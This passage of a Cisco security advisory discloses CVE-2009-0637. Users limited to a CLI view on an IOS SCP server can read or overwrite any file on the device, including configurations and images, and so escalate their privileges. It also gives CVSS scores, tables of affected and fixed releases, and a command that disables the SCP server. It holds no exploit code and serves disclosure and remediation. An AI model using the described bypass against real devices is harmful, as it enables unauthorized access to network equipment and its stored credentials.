SCP is a protocol similar to the Remote Copy (RCP) protocol, which
allows the transfer of files between systems. The main difference
between SCP and RCP is that in SCP, all aspects of the file transfer
session, including authentication, occur in encrypted form, which
makes SCP a more secure alternative than RCP. SCP relies on the
Secure Shell (SSH) protocol, which uses TCP port 22 by default.
The Role-Based CLI Access feature allows the network administrator to
define "views". Views are sets of operational commands and
configuration capabilities that provide selective or partial access
to Cisco IOS software EXEC and configuration (Config) mode commands.
Views restrict user access to Cisco IOS command-line interface (CLI)
and configuration information; that is, a view can define what
commands are accepted and what configuration information is visible.
For more information about the Role-Based CLI Access feature,
reference
http://www.cisco.com/en/US/docs/ios/12_3t/12_3t7/feature/guide/gtclivws.html
The server side of the SCP implementation in Cisco IOS software
contains a vulnerability that allows authenticated users with an
attached command-line interface (CLI) view to transfer files to and
from a Cisco IOS device that is configured to be a SCP server,
regardless of what users are authorized to do, per the CLI view
configuration. This vulnerability could allow authenticated users to
retrieve or write to any file on the device's file system, including
the device's saved configuration and Cisco IOS image files. This
configuration file may include passwords or other sensitive
information.
In the affected configuration presented in the Affected Products
section, users confined to a CLI view can elevate their privileges by
using SCP to write to the device's configuration. Note that a view
can be attached to a user when defining the user in the local
database (via the username <user name> view ... command), or by
passing the attribute cli-view-name from an AAA server.
This vulnerability does not allow for authentication bypass; login
credentials are verified and access is only granted if a valid
username and password is provided. This vulnerability may cause
authorization to be bypassed.
This vulnerability is documented in the Cisco Bug ID CSCsv38166
and has been assigned Common Vulnerabilities and Exposures (CVE) ID
CVE-2009-0637.
Vulnerability Scoring Details
=============================
Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accordance with CVSS
version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding
CVSS at
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at
http://intellishield.cisco.com/security/alertmanager/cvss
CSCsv38166 - SCP + views (role-based CLI) allows privilege escalation
CVSS Base Score - 9.0
Access Vector - Network
Access Complexity - Low
Authentication - Single
Confidentiality Impact - Complete
Integrity Impact - Complete
Availability Impact - Complete
CVSS Temporal Score - 7.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
Impact
=====
Successful exploitation of the vulnerability described in this
advisory may allow valid but unauthorized users to retrieve or write
to any file on the device's file system, including the device's saved
configuration and Cisco IOS image files. This configuration file may
include passwords or other sensitive information.
Software Versions and Fixes
==========================
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to
determine exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.
Each row of the Cisco IOS software table (below) names a Cisco IOS
release train. If a given release train is vulnerable, then the
earliest possible releases that contain the fix (along with the
anticipated date of availability for each, if applicable) are listed
in the "First Fixed Release" column of the table. The "Recommended
Release" column indicates the releases which have fixes for all the
published vulnerabilities at the time of this Advisory. A device
running a release in the given train that is earlier than the release
in a specific column (less than the First Fixed Release) is known to
be vulnerable. Cisco recommends upgrading to a release equal to or
later than the release in the "Recommended Releases" column of the
table.
+-------------------------------------------------------------------+
| Major | Availability of Repaired Releases |
| Release | |
|------------+------------------------------------------------------|
| Affected | | Recommended |
| 12.0-Based | First Fixed Release | Release |
| Releases | | |
|-------------------------------------------------------------------|
| There are no affected 12.0 based releases |
|-------------------------------------------------------------------|
| Affected | | Recommended |
| 12.1-Based | First Fixed Release | Release |
| Releases | | |
|-------------------------------------------------------------------|
| There are no affected 12.1 based releases |
|-------------------------------------------------------------------|
| Affected | | Recommended |
| 12.2-Based | First Fixed Release | Release |
| Releases | | |
|------------+------------------------------------+-----------------|
| 12.2 | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2B | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2BC | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2BW | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2BX | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2BY | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2BZ | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2CX | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2CY | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2CZ | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2DA | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2DD | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2DX | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2EW | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2EWA | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2EX | Vulnerable; migrate to any release | 12.2(44)SE6 |
| | in 12.2SEG | |
|------------+------------------------------------+-----------------|
| 12.2EY | Vulnerable; first fixed in 12.2SE | 12.2(44)SE6 |
|------------+------------------------------------+-----------------|
| 12.2EZ | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2FX | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2FY | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2FZ | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| | | 12.2(33)SRC4; |
| 12.2IRA | Vulnerable; first fixed in 12.2SRC | Available on |
| | | 18-MAY-2009 |
|------------+------------------------------------+-----------------|
| | | 12.2(33)SRC4; |
| 12.2IRB | Vulnerable; first fixed in 12.2SRC | Available on |
| | | 18-MAY-2009 |
|------------+------------------------------------+-----------------|
| 12.2IXA | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2IXB | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2IXC | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2IXD | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2IXE | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2IXF | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2IXG | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2JA | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2JK | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2MB | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2MC | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2S | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2SB | 12.2(33)SB4 | 12.2(33)SB4 |
|------------+------------------------------------+-----------------|
| 12.2SBC | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2SCA | Vulnerable; first fixed in 12.2SCB | 12.2(33)SCB1 |
|------------+------------------------------------+-----------------|
| 12.2SCB | 12.2(33)SCB1 | 12.2(33)SCB1 |
|------------+------------------------------------+-----------------|
| | 12.2(50)SE | |
| 12.2SE | | 12.2(44)SE6 |
| | 12.2(44)SE6 | |
|------------+------------------------------------+-----------------|
| 12.2SEA | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2SEB | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2SEC | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2SED | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2SEE | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2SEF | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2SEG | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| | 12.2(52)SG; Available on | 12.2(52)SG; |
| 12.2SG | 15-MAY-2009 | Available on |
| | | 15-MAY-2009 |
|------------+------------------------------------+-----------------|
| 12.2SGA | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2SL | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2SM | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2SO | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2SQ | Vulnerable; contact TAC | |
|------------+------------------------------------+-----------------|
| 12.2SRA | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| | | 12.2(33)SRC4; |
| | | Available on |
| | | 18-MAY-2009 |
| 12.2SRB | Vulnerable; first fixed in 12.2SRC | |
| | | 12.2(33)SRB5a; |
| | | Available on |
| | | 3-April-2009 |
|------------+------------------------------------+-----------------|
| | 12.2(33)SRC4; Available on | 12.2(33)SRC4; |
| 12.2SRC | 18-MAY-2009 | Available on |
| | | 18-MAY-2009 |
|------------+------------------------------------+-----------------|
| 12.2SRD | 12.2(33)SRD1 | 12.2(33)SRD1 |
|------------+------------------------------------+-----------------|
| 12.2STE | Vulnerable; contact TAC | |
|------------+------------------------------------+-----------------|
| 12.2SU | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2SV | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2SVA | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2SVC | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2SVD | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2SVE | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2SW | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2SX | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2SXA | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2SXB | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2SXD | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2SXE | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2SXF | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2SXH | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2SXI | 12.2(33)SXI1 | 12.2(33)SXI1 |
|------------+------------------------------------+-----------------|
| 12.2SY | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2SZ | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2T | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2TPC | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2XA | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2XB | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2XC | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2XD | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2XE | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2XF | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2XG | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2XH | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2XI | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2XJ | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2XK | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2XL | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2XM | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| | | 12.2(33)SB4 |
| | | |
| | | 12.2(33)SRD1 |
| 12.2XN | Vulnerable; first fixed in 12.2SRC | |
| | | 12.2(33)SRC4; |
| | | Available on |
| | | 18-MAY-2009 |
|------------+------------------------------------+-----------------|
| | | 12.2(33)SRD1 |
| | | |
| 12.2XNA | Vulnerable; first fixed in 12.2SRD | 12.2(33)SRC4; |
| | | Available on |
| | | 18-MAY-2009 |
|------------+------------------------------------+-----------------|
| 12.2XNB | 12.2(33)XNB3 | 12.2(33)XNB3 |
|------------+------------------------------------+-----------------|
| 12.2XNC | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2XO | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2XQ | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2XR | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2XS | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2XT | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2XU | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2XV | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2XW | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2YA | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2YB | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2YC | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2YD | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2YE | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2YF | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2YG | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2YH | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2YJ | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2YK | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2YL | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2YM | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2YN | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2YO | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2YP | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2YQ | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2YR | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2YS | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2YT | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2YU | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2YV | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2YW | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2YX | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2YY | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2YZ | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2ZA | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2ZB | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2ZC | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2ZD | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2ZE | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2ZF | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2ZG | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2ZH | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2ZJ | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2ZL | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2ZP | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2ZU | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2ZX | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2ZY | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.2ZYA | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| Affected | | Recommended |
| 12.3-Based | First Fixed Release | Release |
| Releases | | |
|------------+------------------------------------+-----------------|
| 12.3 | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.3B | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.3BC | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.3BW | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.3EU | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.3JA | Vulnerable; contact TAC | |
|------------+------------------------------------+-----------------|
| 12.3JEA | Vulnerable; contact TAC | |
|------------+------------------------------------+-----------------|
| 12.3JEB | Vulnerable; contact TAC | |
|------------+------------------------------------+-----------------|
| 12.3JEC | Vulnerable; contact TAC | |
|------------+------------------------------------+-----------------|
| | | 12.4(22)T1 |
| | | |
| 12.3JK | Vulnerable; first fixed in 12.4T | 12.4(15)T9; |
| | | Available on |
| | | 29-APR-2009 |
|------------+------------------------------------+-----------------|
| 12.3JL | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.3JX | Vulnerable; contact TAC | |
|------------+------------------------------------+-----------------|
| | | 12.4(22)T1 |
| | | |
| 12.3T | Vulnerable; first fixed in 12.4T | 12.4(15)T9; |
| | | Available on |
| | | 29-APR-2009 |
|------------+------------------------------------+-----------------|
| 12.3TPC | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.3VA | Vulnerable; contact TAC | |
|------------+------------------------------------+-----------------|
| 12.3XA | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.3XB | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.3XC | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.3XD | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.3XE | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.3XF | Vulnerable; contact TAC | |
|------------+------------------------------------+-----------------|
| | | 12.4(22)T1 |
| | | |
| 12.3XG | Vulnerable; first fixed in 12.4T | 12.4(15)T9; |
| | | Available on |
| | | 29-APR-2009 |
|------------+------------------------------------+-----------------|
| 12.3XI | Vulnerable; first fixed in 12.2SB | 12.2(33)SB4 |
|------------+------------------------------------+-----------------|
| 12.3XJ | Vulnerable; first fixed in 12.3YX | 12.3(14)YX14 |
|------------+------------------------------------+-----------------|
| | | 12.4(22)T1 |
| | | |
| 12.3XK | Vulnerable; first fixed in 12.4T | 12.4(15)T9; |
| | | Available on |
| | | 29-APR-2009 |
|------------+------------------------------------+-----------------|
| | | 12.4(22)T1 |
| | | |
| 12.3XL | Vulnerable; first fixed in 12.4T | 12.4(15)T9; |
| | | Available on |
| | | 29-APR-2009 |
|------------+------------------------------------+-----------------|
| | | 12.4(22)T1 |
| | | |
| 12.3XQ | Vulnerable; first fixed in 12.4T | 12.4(15)T9; |
| | | Available on |
| | | 29-APR-2009 |
|------------+------------------------------------+-----------------|
| | | 12.4(18e) |
| | | |
| 12.3XR | Vulnerable; first fixed in 12.4 | 12.4(23a); |
| | | Available on |
| | | 30-APR-2009 |
|------------+------------------------------------+-----------------|
| | | 12.4(22)T1 |
| | | |
| 12.3XS | Vulnerable; first fixed in 12.4T | 12.4(15)T9; |
| | | Available on |
| | | 29-APR-2009 |
|------------+------------------------------------+-----------------|
| | | 12.4(22)T1 |
| | | |
| 12.3XU | Vulnerable; first fixed in 12.4T | 12.4(15)T9; |
| | | Available on |
| | | 29-APR-2009 |
|------------+------------------------------------+-----------------|
| 12.3XW | Vulnerable; first fixed in 12.3YX | 12.3(14)YX14 |
|------------+------------------------------------+-----------------|
| | | 12.4(22)T1 |
| | | |
| 12.3XX | Vulnerable; first fixed in 12.4T | 12.4(15)T9; |
| | | Available on |
| | | 29-APR-2009 |
|------------+------------------------------------+-----------------|
| | | 12.4(22)T1 |
| | | |
| 12.3XY | Vulnerable; first fixed in 12.4T | 12.4(15)T9; |
| | | Available on |
| | | 29-APR-2009 |
|------------+------------------------------------+-----------------|
| 12.3XZ | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| | | 12.4(22)T1 |
| | | |
| 12.3YA | Vulnerable; first fixed in 12.4T | 12.4(15)T9; |
| | | Available on |
| | | 29-APR-2009 |
|------------+------------------------------------+-----------------|
| | | 12.4(22)T1 |
| | | |
| 12.3YD | Vulnerable; first fixed in 12.4T | 12.4(15)T9; |
| | | Available on |
| | | 29-APR-2009 |
|------------+------------------------------------+-----------------|
| 12.3YF | Vulnerable; first fixed in 12.3YX | 12.3(14)YX14 |
|------------+------------------------------------+-----------------|
| | | 12.4(22)T1 |
| | | |
| 12.3YG | Vulnerable; first fixed in 12.4T | 12.4(15)T9; |
| | | Available on |
| | | 29-APR-2009 |
|------------+------------------------------------+-----------------|
| | | 12.4(22)T1 |
| | | |
| 12.3YH | Vulnerable; first fixed in 12.4T | 12.4(15)T9; |
| | | Available on |
| | | 29-APR-2009 |
|------------+------------------------------------+-----------------|
| | | 12.4(22)T1 |
| | | |
| 12.3YI | Vulnerable; first fixed in 12.4T | 12.4(15)T9; |
| | | Available on |
| | | 29-APR-2009 |
|------------+------------------------------------+-----------------|
| | | 12.4(22)T1 |
| | | |
| 12.3YJ | Vulnerable; first fixed in 12.4T | 12.4(15)T9; |
| | | Available on |
| | | 29-APR-2009 |
|------------+------------------------------------+-----------------|
| | | 12.4(22)T1 |
| | | |
| 12.3YK | Vulnerable; first fixed in 12.4T | 12.4(15)T9; |
| | | Available on |
| | | 29-APR-2009 |
|------------+------------------------------------+-----------------|
| 12.3YM | 12.3(14)YM13 | 12.3(14)YM13 |
|------------+------------------------------------+-----------------|
| | | 12.4(22)T1 |
| | | |
| 12.3YQ | Vulnerable; first fixed in 12.4T | 12.4(15)T9; |
| | | Available on |
| | | 29-APR-2009 |
|------------+------------------------------------+-----------------|
| | | 12.4(22)T1 |
| | | |
| 12.3YS | Vulnerable; first fixed in 12.4T | 12.4(15)T9; |
| | | Available on |
| | | 29-APR-2009 |
|------------+------------------------------------+-----------------|
| | | 12.4(22)T1 |
| | | |
| 12.3YT | Vulnerable; first fixed in 12.4T | 12.4(15)T9; |
| | | Available on |
| | | 29-APR-2009 |
|------------+------------------------------------+-----------------|
| | | 12.4(22)T1 |
| | | |
| 12.3YU | Vulnerable; first fixed in 12.4T | 12.4(15)T9; |
| | | Available on |
| | | 29-APR-2009 |
|------------+------------------------------------+-----------------|
| 12.3YX | 12.3(14)YX14 | 12.3(14)YX14 |
|------------+------------------------------------+-----------------|
| 12.3YZ | Vulnerable; contact TAC | |
|------------+------------------------------------+-----------------|
| | | 12.4(22)T1 |
| | | |
| 12.3ZA | Vulnerable; first fixed in 12.4T | 12.4(15)T9; |
| | | Available on |
| | | 29-APR-2009 |
|------------+------------------------------------+-----------------|
| Affected | | Recommended |
| 12.4-Based | First Fixed Release | Release |
| Releases | | |
|------------+------------------------------------+-----------------|
| | 12.4(18e) | 12.4(18e) |
| | | |
| 12.4 | 12.4(23a); Available on | 12.4(23a); |
| | 30-APR-2009 | Available on |
| | | 30-APR-2009 |
|------------+------------------------------------+-----------------|
| 12.4JA | Vulnerable; contact TAC | |
|------------+------------------------------------+-----------------|
| 12.4JDA | Vulnerable; contact TAC | |
|------------+------------------------------------+-----------------|
| 12.4JK | Vulnerable; contact TAC | |
|------------+------------------------------------+-----------------|
| 12.4JL | Vulnerable; contact TAC | |
|------------+------------------------------------+-----------------|
| 12.4JMA | Vulnerable; contact TAC | |
|------------+------------------------------------+-----------------|
| 12.4JMB | Vulnerable; contact TAC | |
|------------+------------------------------------+-----------------|
| 12.4JX | Vulnerable; contact TAC | |
|------------+------------------------------------+-----------------|
| 12.4MD | 12.4(11)MD7 | 12.4(11)MD7 |
|------------+------------------------------------+-----------------|
| 12.4MR | 12.4(19)MR2 | 12.4(19)MR2 |
|------------+------------------------------------+-----------------|
| 12.4SW | Vulnerable; contact TAC | |
|------------+------------------------------------+-----------------|
| | 12.4(24)T | |
| | | 12.4(22)T1 |
| | 12.4(20)T2 | |
| 12.4T | | 12.4(15)T9; |
| | 12.4(22)T1 | Available on |
| | | 29-APR-2009 |
| | 12.4(15)T9; Available on | |
| | 29-APR-2009 | |
|------------+------------------------------------+-----------------|
| | | 12.4(22)T1 |
| | | |
| 12.4XA | Vulnerable; first fixed in 12.4T | 12.4(15)T9; |
| | | Available on |
| | | 29-APR-2009 |
|------------+------------------------------------+-----------------|
| | | 12.4(22)T1 |
| | | |
| 12.4XB | Vulnerable; first fixed in 12.4T | 12.4(15)T9; |
| | | Available on |
| | | 29-APR-2009 |
|------------+------------------------------------+-----------------|
| | | 12.4(22)T1 |
| | | |
| 12.4XC | Vulnerable; first fixed in 12.4T | 12.4(15)T9; |
| | | Available on |
| | | 29-APR-2009 |
|------------+------------------------------------+-----------------|
| | 12.4(4)XD12; Available on | 12.4(4)XD12; |
| 12.4XD | 27-MAR-2009 | Available on |
| | | 27-MAR-2009 |
|------------+------------------------------------+-----------------|
| | | 12.4(22)T1 |
| | | |
| 12.4XE | Vulnerable; first fixed in 12.4T | 12.4(15)T9; |
| | | Available on |
| | | 29-APR-2009 |
|------------+------------------------------------+-----------------|
| | | 12.4(22)T1 |
| | | |
| 12.4XF | Vulnerable; first fixed in 12.4T | 12.4(15)T9; |
| | | Available on |
| | | 29-APR-2009 |
|------------+------------------------------------+-----------------|
| | | 12.4(22)T1 |
| | 12.4(20)T2 | |
| 12.4XG | | 12.4(15)T9; |
| | 12.4(22)T1 | Available on |
| | | 29-APR-2009 |
|------------+------------------------------------+-----------------|
| | | 12.4(22)T1 |
| | | |
| 12.4XJ | Vulnerable; first fixed in 12.4T | 12.4(15)T9; |
| | | Available on |
| | | 29-APR-2009 |
|------------+------------------------------------+-----------------|
| | | 12.4(22)T1 |
| | | |
| 12.4XK | Vulnerable; first fixed in 12.4T | 12.4(15)T9; |
| | | Available on |
| | | 29-APR-2009 |
|------------+------------------------------------+-----------------|
| | Releases prior to 12.4(15)XL4 are | |
| 12.4XL | vulnerable, release 12.4(15)XL4 | 12.4(15)XL4 |
| | and later are not vulnerable; | |
|------------+------------------------------------+-----------------|
| | | 12.4(22)T1 |
| | | |
| 12.4XM | Vulnerable; first fixed in 12.4T | 12.4(15)T9; |
| | | Available on |
| | | 29-APR-2009 |
|------------+------------------------------------+-----------------|
| 12.4XN | Vulnerable; contact TAC | |
|------------+------------------------------------+-----------------|
| 12.4XP | Vulnerable; contact TAC | |
|------------+------------------------------------+-----------------|
| 12.4XQ | 12.4(15)XQ2 | 12.4(15)XQ2 |
|------------+------------------------------------+-----------------|
| | | 12.4(22)T1 |
| | | |
| 12.4XR | Vulnerable; first fixed in 12.4T | 12.4(15)T9; |
| | | Available on |
| | | 29-APR-2009 |
|------------+------------------------------------+-----------------|
| | | 12.4(22)T1 |
| | | |
| 12.4XT | Vulnerable; first fixed in 12.4T | 12.4(15)T9; |
| | | Available on |
| | | 29-APR-2009 |
|------------+------------------------------------+-----------------|
| 12.4XV | Vulnerable; contact TAC | |
|------------+------------------------------------+-----------------|
| 12.4XW | 12.4(11)XW10 | 12.4(11)XW10 |
|------------+------------------------------------+-----------------|
| | | 12.4(22)T1 |
| | | |
| 12.4XY | Vulnerable; first fixed in 12.4T | 12.4(15)T9; |
| | | Available on |
| | | 29-APR-2009 |
|------------+------------------------------------+-----------------|
| 12.4XZ | 12.4(15)XZ2 | 12.4(15)XZ2 |
|------------+------------------------------------+-----------------|
| 12.4YA | 12.4(20)YA2 | 12.4(20)YA3 |
|------------+------------------------------------+-----------------|
| 12.4YB | Not Vulnerable | |
|------------+------------------------------------+-----------------|
| 12.4YD | Not Vulnerable | |
+-------------------------------------------------------------------+
Workarounds
==========
If the Cisco IOS SCP server functionality is not needed then the
vulnerability described in this document can be mitigated by
disabling the SCP server or the CLI view feature. The SCP server can
be disabled by executing the following command in global
configuration mode:
no ip scp server enable
If the SCP server cannot be disabled due to operational concerns,
then no workarounds exist. The risk posed by this vulnerability can
be mitigated by following the best practices detailed in "Cisco Guide
to Harden Cisco IOS Devices" at
http://www.cisco.com/en/US/tech/tk648/tk361/technologies_tech_note09186a0080120f48.shtml
Please refer to the Obtaining Fixed Software section of this advisory
for appropriate solutions to resolve this vulnerability.
Due to the nature of this vulnerability, networking best practices
like access control lists (ACLs) and Control Plane Policing (CoPP)
that restrict access to a device to certain IP addresses or
subnetworks may not be effective. If access is already granted to a
specific IP address or subnetwork, a user with low privileges will be
able to establish an SCP session with the device, which would allow
the user to exploit this vulnerability.
Obtaining Fixed Software
=======================
Cisco has released free software updates that address these
vulnerabilities. Prior to deploying software, customers should
consult their maintenance provider or check the software for feature
set compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound
by the terms of Cisco's software license terms found at
http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html, or as
otherwise set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml
Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.
Customers with Service Contracts
+-------------------------------
Customers with contracts should obtain upgraded software through
their regular update channels. For most customers, this means that
upgrades should be obtained through the Software Center on Cisco's
worldwide website at
http://www.cisco.com
Customers using Third Party Support Organizations
+------------------------------------------------
Customers whose Cisco products are provided or maintained through
prior or existing agreements with third-party support organizations,
such as Cisco Partners, authorized resellers, or service providers
should contact that support organization for guidance and assistance
with the appropriate course of action in regards to this advisory.
The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.
Customers without Service Contracts
+----------------------------------
Customers who purchase direct from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through
their point of sale should acquire upgrades by contacting the Cisco
Technical Assistance Center (TAC). TAC contacts are as follows.
* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com
Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to
